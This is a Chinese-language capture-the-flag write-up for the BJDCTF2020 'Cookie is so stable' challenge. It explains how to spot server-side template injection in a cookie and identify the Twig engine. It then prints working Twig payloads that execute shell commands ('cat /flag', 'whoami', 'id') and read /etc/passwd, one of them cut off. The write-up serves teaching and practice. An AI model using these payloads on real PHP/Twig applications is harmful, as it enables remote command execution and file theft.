[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)

目录

信息收集

hint页面

flag页面

命令执行 

reference

---

信息收集

hint页面

flag页面

输入任意内容（这里输入admin）

这里第一反应是cookie类的SQL注入？但是发现这里其实并没有实现查询信息的功能，只是将输入的内容进行打印，看下前端源码，可能是SSTI！

修改cookie

${7*7}----------{{7*7}}---------{{7*'7'}}

 确认是SSTI（PHP），根据上文的流程表判定类型是Twig

在 Twig 模板中可以直接调用函数，用于生产内容。如下调用了 range()函数用来返回一个包含整数等差数列的列表：

{% for i in range(0, 3) %}{{ i }},{% endfor %}

在twig 1.x版本，存在三个全局变量

• _self：引用当前模板实例

• _context：引用上下文

• _charset：引用当前字符集

命令执行 

payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

这里可以直接修改cookie，因为直接提交会被拦截

当然flag在根目录下是猜的，我们使用命令返回的结果只有第一项

一些新版本的payload

{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.enableDebug()}}{{_self.env.isDebug()}}

{{["id"]|map("system")|join(",")

{{{"

reference

https://xz.aliyun.com/t/7518#toc-5

https://www.freebuf.com/articles/web/314028.html

https://www.cnblogs.com/bmjoker/p/13508538.html

[BJDCTF2020]Cookie is so stable | 信安小蚂蚁